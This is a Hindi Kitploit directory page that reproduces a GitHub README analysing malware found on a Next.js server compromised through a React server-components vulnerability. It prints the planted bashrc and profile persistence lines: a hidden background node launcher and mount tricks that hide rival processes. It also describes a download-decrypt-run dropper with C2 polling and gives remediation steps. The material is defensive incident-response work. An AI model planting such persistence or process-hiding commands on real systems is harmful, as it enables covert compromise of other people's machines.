Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react-cve-2025-55182 — CVE-2025-55182 के माध्यम से समझौता किए गए सर्वर पर पाए गए मैलवेयर का विश्लेषण, जिसमें अस्पष्ट ड्रॉपर, C2 संचार, दृढ़ता तंत्र, और फोरेंसिक जांच शामिल है। | Kitploit
उपकरण/GitHubGitHub/stonelinks/react-cve-2025-55182
स्थायित्व तंत्ररिवर्स इंजीनियरिंगडेटा निष्कासनफोरेंसिकमालवेयर विश्लेषणकमांड एंड कंट्रोलखतरा खुफियाघटना प्रतिक्रियापेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHubstonelinks/react-cve-2025-55182

react-cve-2025-55182

CVE-2025-55182 के माध्यम से समझौता किए गए सर्वर पर पाए गए मैलवेयर का विश्लेषण, जिसमें अस्पष्ट ड्रॉपर, C2 संचार, दृढ़ता तंत्र, और फोरेंसिक जांच शामिल है।

रिपॉजिटरी देखें
179 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

react-cve-2025-55182

यह मैलवेयर और अन्य संदिग्ध कचरे का एक डंप है जो मुझे मेरी शादी की वेबसाइट के सर्वर पर मिला, जो react सर्वर साइड रेंडरिंग कोड निष्पादन शोषण के बाद हुआ। यह एक छोटा डिजिटल ओशन ड्रॉपलेट है जो एक सामान्य next js ऐप चला रहा है।

CVE: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

सर्वर गतिविधि का एक लॉग जो विभिन्न स्पाइक्स और अन्य चीज़ें दिखाता है: image

मुख्य खलनायक /.local/share/.r0qsv8h1 में स्थापित यह चीज़ प्रतीत होता है।

मुझे जो मिला

मेरे bashrc में:

root@kitploit:~
# System
(nohup /.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null

ध्यान दें कि pgreps इस अन्य नकली "meshagent" मैलवेयर को चलने से रोकने के लिए हैं। आप इसके बारे में MESHAGENT.md दस्तावेज़ में पढ़ सकते हैं।

मेरे प्रोफ़ाइल में भी यही है:

root@kitploit:~
# App
(/.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null

आप SUSPICIOUS_SERVICES.md में अन्य संदिग्ध सेवाएँ देख सकते हैं।

यहाँ इस मुख्य बुरे मैलवेयर का विश्लेषण है:

/.local/ सामग्री का अवलोकन

निर्देशिका bad में एक स्व-निहित Node.js रनटाइम है जो भारी रूप से अस्पष्टीकृत JavaScript फ़ाइलों के एक सेट के साथ बंडल किया गया है।
सभी सबूत बताते हैं कि यह एक दुर्भावनापूर्ण ड्रॉपर है जो चुपचाप एक रिमोट सर्वर से संपर्क करता है, एक एन्क्रिप्टेड पेलोड डाउनलोड करता है, इसे डिक्रिप्ट करता है, इसे डिस्क पर लिखता है, और इसे एक अलग पृष्ठभूमि प्रक्रिया के रूप में निष्पादित करता है। कोड समय-समय पर सर्वर पर अपडेट की जाँच भी करता है।

फ़ाइलें और उनका उद्देश्य

फ़ाइलविवरण
.394ly8v9/README.mdमानक Node.js README – दुर्भावनापूर्ण कार्यक्षमता से संबंधित नहीं; बंडल को वैध दिखाने के लिए ही मौजूद है।
.fvq2lzl64e.js~5 KB अस्पष्टीकृत JavaScript। यह एक JSON‑RPC HTTP अनुरोध बनाता है, एक base64-एन्कोडेड पेलोड प्राप्त करता है, इसे एक कस्टम सिफर से डिक्रिप्ट करता है, पेलोड को एक यादृच्छिक फ़ाइल में लिखता है, और इसे child_process.spawn / execSync के माध्यम से निष्पादित करता है। यह एक अलग पृष्ठभूमि प्रक्रिया भी उत्पन्न करता है जो बार-बार रिमोट सर्वर को पोल करता है।
.lauphhtqrg.js~13 KB अस्पष्टीकृत JavaScript। अपने स्वयं के RC4-शैली सिफर (dec) के साथ एक समान डाउनलोड‑डिक्रिप्ट‑रन लूप लागू करता है। डिक्रिप्टेड पेलोड को एक उत्पन्न फ़ाइलनाम पर लिखता है और इसे चलाता है। बाद में नए पेलोड लाने के लिए एक टाइमर सेट करता है।
.5f8562सादा-पाठ Base64 स्ट्रिंग। एक छोटे JSON मैनिफेस्ट में डिकोड होता है: json { "0":"c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c", "1":".fvq2lzj6te.js", "3":1765307786421, "4":"desktop" } यह मैनिफेस्ट लोडर को बताता है कि कौन सी स्क्रिप्ट निष्पादित करनी है (.fvq2lzj6te.js) और एक पहचानकर्ता/टाइमस्टैम्प प्रदान करता है।
.b0rtqscrkeovअभी तक जांचा नहीं गया, लेकिन नामकरण पैटर्न बताता है कि यह उसी दुर्भावनापूर्ण श्रृंखला का एक और घटक है।
bin/node और साथ में lib/ फ़ाइलेंएक पूर्ण Node.js रनटाइम, जो स्क्रिप्ट को सिस्टम पर चलाने की अनुमति देता है भले ही Node.js स्थापित न हो।

मैनिफेस्ट डिकोडिंग

.5f8562 में Base64 पेलोड डिकोड होकर:

root@kitploit:~
{
  "0": "c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c",
  "1": ".fvq2lzj6te.js",
  "3": 1765307786421,
  "4": "desktop"
}
  • कुंजी "1" मुख्य अस्पष्टीकृत लोडर स्क्रिप्ट को संदर्भित करती है।
  • कुंजी "0" एक UUID है जिसका उपयोग संभवतः रिमोट सर्वर द्वारा ट्रैकिंग के लिए किया जाता है।
  • कुंजी "3" एक टाइमस्टैम्प (Unix‑epoch ms) है जो बताता है कि मैनिफेस्ट कब उत्पन्न हुआ था।
  • कुंजी "4" इच्छित स्थान (desktop) को इंगित करती है, जो संकेत देती है कि पेलोड वहां खुद को छिपाने की कोशिश कर सकता है।

निष्पादन प्रवाह

  1. बूटस्ट्रैप – जब बंडल किया गया Node बाइनरी शुरू होता है (जैसे, node .5f8562), मैनिफेस्ट .fvq2lzj6te.js की ओर इशारा करता है।
  2. डाउनलोडर – लोडर एक रिमोट कमांड‑एंड‑कंट्रोल सर्वर के लिए एक JSON‑RPC अनुरोध बनाता है, एक base64-एन्कोडेड ब्लॉब प्राप्त करता है, और इसे एक कस्टम RC4-जैसे एल्गोरिदम का उपयोग करके डिक्रिप्ट करता है।
  3. पेलोड तैनाती – डिक्रिप्टेड डेटा को उपयोगकर्ता के वातावरण में एक यादृच्छिक-नाम वाली फ़ाइल में लिखा जाता है और एक अलग चाइल्ड प्रक्रिया के रूप में निष्पादित किया जाता है।
  4. दृढ़ता / अद्यतन लूप – एक setInterval टाइमर समय-समय पर डाउनलोड‑डिक्रिप्ट‑रन अनुक्रम को दोहराता है, जिससे हमलावर बिना किसी और उपयोगकर्ता इंटरैक्शन के नए या अद्यतन पेलोड धकेल सकता है।
  5. पृष्ठभूमि निष्पादन – उत्पन्न प्रक्रिया अपने स्वयं के वातावरण (PATH, cwd, आदि) के साथ चलती है और विशिष्ट दुर्भावनापूर्ण क्रियाएं जैसे क्रिप्टोमाइनिंग, क्रेडेंशियल चुराना, या रिमोट कमांड निष्पादन कर सकती है।

संभावित प्रभाव

  • सिस्टम समझौता – Node रनटाइम लॉन्च करने वाले उपयोगकर्ता के विशेषाधिकारों के साथ मनमाना कोड निष्पादन।
  • दृढ़ता – आवधिक पोलिंग सुनिश्चित करती है कि मैलवेयर को किसी भी समय ताज़ा या बदला जा सकता है।
  • संसाधन दुरुपयोग – संभवतः CPU-गहन कार्य (जैसे, क्रिप्टोकरेंसी माइनिंग) चलाता है या डेटा बाहर निकालता है।
  • चुपके – फ़ाइलें भारी रूप से अस्पष्टीकृत हैं और एक वैध-दिखने वाले Node README की उपस्थिति दुर्भावनापूर्ण प्रकृति को छिपाने में मदद करती है।

सिफारिशें

  1. तत्काल हटाना – संपूर्ण .r0qsv8h1 निर्देशिका और उसके द्वारा बनाई गई कोई भी फ़ाइल हटाएं (नवनिर्मित निष्पादन योग्य के लिए उपयोगकर्ता के Desktop और अस्थायी निर्देशिकाओं की जाँच करें)।
  2. सिस्टम स्कैन – किसी भी अवशिष्ट घटक का पता लगाने के लिए होस्ट पर एक प्रतिष्ठित एंटी-मैलवेयर स्कैनर चलाएं।
  3. निष्पादन पथ सत्यापित करें – सुनिश्चित करें कि कोई स्टार्टअप स्क्रिप्ट या शेड्यूल किए गए कार्य इस निर्देशिका में फ़ाइलों का संदर्भ नहीं देते हैं।
  4. नेटवर्क निगरानी – प्रभावित मशीन से अज्ञात आईपी/होस्ट के लिए आउटबाउंड कनेक्शन ब्लॉक करें और संदिग्ध आउटबाउंड अनुरोधों के लिए हाल के नेटवर्क ट्रैफ़िक की समीक्षा करें।
  5. सुरक्षा नीतियां अपडेट करें – अज्ञात बाइनरी और स्क्रिप्ट के निष्पादन को प्रतिबंधित करें, विशेष रूप से उपयोगकर्ता-लेखन योग्य स्थानों पर डाउनलोड की गई।

यह विश्लेषण निर्देशिका में मौजूद फ़ाइलों की स्थैतिक जांच के आधार पर एक AI सहायक द्वारा स्वचालित रूप से किया गया था। कोई रनटाइम निष्पादन नहीं किया गया था।

आप DEOBFUSCATE.md में और पढ़ सकते हैं।

टूल डाउनलोड करें